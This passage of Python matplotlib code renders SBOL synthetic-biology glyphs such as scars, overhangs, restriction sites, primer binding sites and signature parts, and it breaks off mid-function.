if start > end:
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
# Patches and lines for top glyph
# toptype=="X"
x1 = Line2D([start,end],[-y_extent*1.25,-y_extent/1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
x2 = Line2D([start,end],[-y_extent/1.25,-y_extent*1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
# toptype=="O"
center = (end+((start-end)/2.0),-y_extent)
c1 = Circle(center, x_extent/2.0, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=12+zorder_add)
# toptype=='P'
pentagon_xy = [[end, -y_extent*1.25],
[end, -y_extent*0.87],
[(start + end)/2, -y_extent*0.68],
[start, -y_extent*0.87],
[start, -y_extent*1.25],
]
p1 = Polygon(pentagon_xy, closed=True, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=12+zorder_add)
# Lines for stem glyph
# stemtype=='straight'
straight_stem = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0, -y_extent],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
# stemtype=='wavy'
wave_height = y_extent/6
wave_start = (start + end)/2
wave_bezier_amp = x_extent*0.2
wave_bezier_dx = wave_bezier_amp*math.cos(math.pi/4)
wave_bezier_dy = wave_bezier_amp*math.sin(math.pi/4)
wavy_stem_path = Path(vertices=[[wave_start, 0],
[wave_start - wave_bezier_dx, -wave_bezier_dy],
[wave_start - wave_bezier_dx, -(wave_height - wave_bezier_dy)],
[wave_start, -wave_height],
[wave_start + wave_bezier_dx, -(wave_height + wave_bezier_dy)],
[wave_start + wave_bezier_dx, -(2*wave_height - wave_bezier_dy)],
[wave_start, -2*wave_height],
[wave_start - wave_bezier_dx, -(2*wave_height + wave_bezier_dy)],
[wave_start - wave_bezier_dx, -(3*wave_height - wave_bezier_dy)],
[wave_start, -3*wave_height],
[wave_start + wave_bezier_dx, -(3*wave_height + wave_bezier_dy)],
[wave_start + wave_bezier_dx, -(4*wave_height - wave_bezier_dy)],
[wave_start, -4*wave_height],
[wave_start - wave_bezier_dx, -(4*wave_height + wave_bezier_dy)],
[wave_start - wave_bezier_dx, -(5*wave_height - wave_bezier_dy)],
[wave_start, -5*wave_height],
[wave_start + wave_bezier_dx, -(5*wave_height + wave_bezier_dy)],
[wave_start + wave_bezier_dx, -(6*wave_height - wave_bezier_dy)],
[wave_start, -6*wave_height]],
codes=[1, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4])
wavy_stem = PathPatch(wavy_stem_path, linewidth=linewidth, edgecolor=color,
facecolor='none', zorder=8+zorder_add, linestyle=linestyle)
# stemtype=='loopy'
loop_offset_y = y_extent*0.015
loop_height = (y_extent - 2*loop_offset_y)/4
loop_start = (start + end)/2 + x_extent*0.05
loop_end = end + x_extent*0.15
loop_bezier_amp = y_extent*0.03
loop_stem_path = Path(vertices=[[loop_start, -loop_offset_y],
[loop_start, -(loop_offset_y - loop_bezier_amp)],
[loop_end, -(loop_offset_y - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*0.5)],
[loop_end, -(loop_offset_y + loop_height + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height)],
[loop_start, -(loop_offset_y + loop_height - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*1.5)],
[loop_end, -(loop_offset_y + loop_height*2 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*2 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*2)],
[loop_start, -(loop_offset_y + loop_height*2 - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*2 - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*2.5)],
[loop_end, -(loop_offset_y + loop_height*3 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*3 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*3)],
[loop_start, -(loop_offset_y + loop_height*3 - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*3 - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*3.5)],
[loop_end, -(loop_offset_y + loop_height*4 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*4 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*4)],
],
codes=[1, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4])
loop_stem = PathPatch(loop_stem_path, linewidth=linewidth, edgecolor=color,
facecolor='none', zorder=8+zorder_add, linestyle=linestyle)
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
# Patches and lines for top glyph
# toptype=="X"
x1 = Line2D([start,end],[y_extent*1.25,y_extent/1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
x2 = Line2D([start,end],[y_extent/1.25,y_extent*1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
# toptype=="O"
center = (start+((end-start)/2.0),y_extent)
c1 = Circle(center, x_extent/2.0, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=12+zorder_add)
# toptype=='P'
pentagon_xy = [[start, y_extent*1.25],
[start, y_extent*0.87],
[(start + end)/2, y_extent*0.68],
[end, y_extent*0.87],
[end, y_extent*1.25],
]
p1 = Polygon(pentagon_xy, closed=True, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=12+zorder_add)
# Lines for stem glyph
# stemtype=='straight'
straight_stem = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,y_extent],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
# stemtype=='wavy'
wave_height = y_extent/6
wave_start = (start + end)/2
wave_bezier_amp = x_extent*0.2
wave_bezier_dx = wave_bezier_amp*math.cos(math.pi/4)
wave_bezier_dy = wave_bezier_amp*math.sin(math.pi/4)
wavy_stem_path = Path(vertices=[[wave_start, 0],
[wave_start + wave_bezier_dx, wave_bezier_dy],
[wave_start + wave_bezier_dx, wave_height - wave_bezier_dy],
[wave_start, wave_height],
[wave_start - wave_bezier_dx, wave_height + wave_bezier_dy],
[wave_start - wave_bezier_dx, 2*wave_height - wave_bezier_dy],
[wave_start, 2*wave_height],
[wave_start + wave_bezier_dx, 2*wave_height + wave_bezier_dy],
[wave_start + wave_bezier_dx, 3*wave_height - wave_bezier_dy],
[wave_start, 3*wave_height],
[wave_start - wave_bezier_dx, 3*wave_height + wave_bezier_dy],
[wave_start - wave_bezier_dx, 4*wave_height - wave_bezier_dy],
[wave_start, 4*wave_height],
[wave_start + wave_bezier_dx, 4*wave_height + wave_bezier_dy],
[wave_start + wave_bezier_dx, 5*wave_height - wave_bezier_dy],
[wave_start, 5*wave_height],
[wave_start - wave_bezier_dx, 5*wave_height + wave_bezier_dy],
[wave_start - wave_bezier_dx, 6*wave_height - wave_bezier_dy],
[wave_start, 6*wave_height]],
codes=[1, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4])
wavy_stem = PathPatch(wavy_stem_path, linewidth=linewidth, edgecolor=color,
facecolor='none', zorder=8+zorder_add, linestyle=linestyle)
# stemtype=='loopy'
loop_offset_y = y_extent*0.015
loop_height = (y_extent - 2*loop_offset_y)/4
loop_start = (start + end)/2 - x_extent*0.05
loop_end = end - x_extent*0.15
loop_bezier_amp = y_extent*0.03
loop_stem_path = Path(vertices=[[loop_start, loop_offset_y],
[loop_start, loop_offset_y - loop_bezier_amp],
[loop_end, loop_offset_y - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*0.5],
[loop_end, loop_offset_y + loop_height + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height],
[loop_start, loop_offset_y + loop_height - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*1.5],
[loop_end, loop_offset_y + loop_height*2 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*2 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*2],
[loop_start, loop_offset_y + loop_height*2 - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*2 - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*2.5],
[loop_end, loop_offset_y + loop_height*3 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*3 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*3],
[loop_start, loop_offset_y + loop_height*3 - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*3 - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*3.5],
[loop_end, loop_offset_y + loop_height*4 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*4 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*4],
],
codes=[1, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4])
loop_stem = PathPatch(loop_stem_path, linewidth=linewidth, edgecolor=color,
facecolor='none', zorder=8+zorder_add, linestyle=linestyle)
# Add stem patches and/or lines
if stemtype == 'straight':
ax.add_line(straight_stem)
elif stemtype == 'wavy':
ax.add_line(wavy_stem)
elif stemtype == 'loopy':
ax.add_line(loop_stem)
# Add top patches and/or lines
if toptype == 'O':
ax.add_patch(c1)
elif toptype == 'X':
ax.add_line(x1)
ax.add_line(x2)
elif toptype == 'P':
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_scar (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL scar renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 6.0
y_extent = 1.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
l_top = Line2D([start,start+x_extent],[y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l_bottom = Line2D([start,start+x_extent],[-1*y_extent,-1*y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=(1,1,1), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
ax.add_line(l_top)
ax.add_line(l_bottom)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_empty_space (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in empty space renderer.
"""
# Default options
zorder_add = 0.0
x_extent = 12.0
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
# Check direction add start padding
final_start = prev_end
final_end = final_start+x_extent
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_5_overhang (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL 5' overhang renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 0.0
end_pad = 2.0
x_extent = 6.0
y_extent = 1.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
l_top = Line2D([start,start+x_extent],[y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l_bottom = Line2D([start+(x_extent/2.0),start+x_extent],[-1*y_extent,-1*y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=(1,1,1), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
ax.add_line(l_top)
ax.add_line(l_bottom)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_3_overhang (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL 3' overhang renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 0.0
x_extent = 6.0
y_extent = 1.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
l_top = Line2D([start,start+x_extent],[y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l_bottom = Line2D([start,start+(x_extent/2.0)],[-1*y_extent,-1*y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=(1,1,1), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
ax.add_line(l_top)
ax.add_line(l_bottom)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_blunt_restriction_site (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL blunt-end restriction site renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 4.0
x_extent = 1.5
site_space = 1.5
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'site_space' in list(opts.keys()):
site_space = opts['site_space']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Direction is meaningless for this part => start is always < end
if start > end:
temp_end = end
end = start
start = temp_end
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent+site_space+x_extent
final_end = end+end_pad
l1 = Line2D([start+x_extent,start+x_extent],[-y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_top = Line2D([start,start+x_extent],[y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_bottom = Line2D([start,start+x_extent],[-y_extent,-y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l2 = Line2D([end-x_extent,end-x_extent],[-y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l2_top = Line2D([end,end-x_extent],[y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l2_bottom = Line2D([end,end-x_extent],[-y_extent,-y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(l1)
ax.add_line(l1_top)
ax.add_line(l1_bottom)
ax.add_line(l2)
ax.add_line(l2_top)
ax.add_line(l2_bottom)
if opts != None and 'label' in list(opts.keys()):
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
return final_start, final_end
def sbol_primer_binding_site (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL primer binding site renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 2.0
y_offset = 1.5
x_extent = 8.0
arrowhead_length = 2.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
direction = 'F'
if start > end:
direction = 'R'
temp_end = end
end = start
start = temp_end
final_end = prev_end
final_start = prev_end
if direction == 'F':
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
else:
final_start = prev_end
end = prev_end+end_pad
start = end+x_extent
final_start = start+start_pad
if direction == 'F':
verts = [(start, y_offset), (end, y_offset), (end-arrowhead_length, y_offset+y_extent)]
codes = [Path.MOVETO, Path.LINETO, Path.LINETO]
path = Path(verts, codes)
patch = PathPatch(path, lw=linewidth, edgecolor=color, facecolor=(1,1,1), zorder=1+zorder_add)
ax.add_patch(patch)
else:
verts = [(start, -y_offset), (end, -y_offset), (end+arrowhead_length, -y_offset-y_extent)]
codes = [Path.MOVETO, Path.LINETO, Path.LINETO]
path = Path(verts, codes)
patch = PathPatch(path, lw=linewidth, edgecolor=color, facecolor=(1,1,1), zorder=1+zorder_add)
ax.add_patch(patch)
if opts != None and 'label' in list(opts.keys()):
if start > end:
write_label(ax, opts['label'], end+((start-end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start+((end-start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_5_sticky_restriction_site (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL 5' sticky-end restriction site renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 4.0
x_extent = 8.0
end_space = 1.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'end_space' in list(opts.keys()):
end_space = opts['end_space']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Direction is meaningless for this part => start is always < end
if start > end:
temp_end = end
end = start
start = temp_end
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+end_space+x_extent+end_space
final_end = end+end_pad
l1 = Line2D([start+end_space,start+end_space+x_extent],[0,0],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_top = Line2D([start+end_space,start+end_space],[0,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_bottom = Line2D([start+end_space+x_extent,start+end_space+x_extent],[0,-y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(l1)
ax.add_line(l1_top)
ax.add_line(l1_bottom)
# White rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(end, -y_extent),
(end, y_extent)],
edgecolor=(1,1,1), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
return final_start, final_end
def sbol_3_sticky_restriction_site (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL 3' sticky-end restriction site renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 4.0
x_extent = 8.0
end_space = 1.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'end_space' in list(opts.keys()):
end_space = opts['end_space']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Direction is meaningless for this part => start is always < end
if start > end:
temp_end = end
end = start
start = temp_end
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+end_space+x_extent+end_space
final_end = end+end_pad
l1 = Line2D([start+end_space,start+end_space+x_extent],[0,0],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_top = Line2D([start+end_space+x_extent,start+end_space+x_extent],[0,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_bottom = Line2D([start+end_space,start+end_space],[0,-y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(l1)
ax.add_line(l1_top)
ax.add_line(l1_bottom)
# White rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(end, -y_extent),
(end, y_extent)],
edgecolor=(1,1,1), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
return final_start, final_end
def sbol_user_defined (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL user-defined element renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 12.0
y_extent = 3.0
linestyle = '-'
fill_color = (1,1,1)
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'fill_color' in list(opts.keys()):
fill_color = opts['fill_color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=color, facecolor=fill_color, linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_signature (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL signature renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 12.0
y_extent = 3.0
linestyle = '-'
fill_color = (1,1,1)
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'fill_color' in list(opts.keys()):
fill_color = opts['fill_color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
direction = 'F'
if start > end:
direction = 'R'
temp_end = end
end = start
start = temp_end
final_end = prev_end
final_start = prev_end
if direction == 'F':
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
else:
final_start = prev_end
end = prev_end+end_pad
start = end+x_extent
final_start = start+start_pad
indent_fac = (y_extent*2.0)*0.3
cross_width = (y_extent*2.0)*0.7
if direction == 'F':
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=color, facecolor=fill_color, linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
top1x = start + indent_fac
top1y = y_extent - indent_fac
top2x = start + cross_width
top2y = y_extent - indent_fac
bot1x = start + indent_fac
bot1y = -y_extent + indent_fac
bot2x = start + cross_width
bot2y = -y_extent + indent_fac
lcross1 = Line2D([top1x,bot2x],[top1y,bot2y],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
lcross2 = Line2D([top2x,bot1x],[top2y,bot1y],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(lcross1)
ax.add_line(lcross2)
lsign = Line2D([bot2x+indent_fac,end-indent_fac],[-y_extent+indent_fac,-y_extent+indent_fac],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(lsign)
else:
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start-x_extent, -y_extent),
(start-x_extent, y_extent)],
edgecolor=color, facecolor=fill_color, linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0)
ax.add_patch(p1)
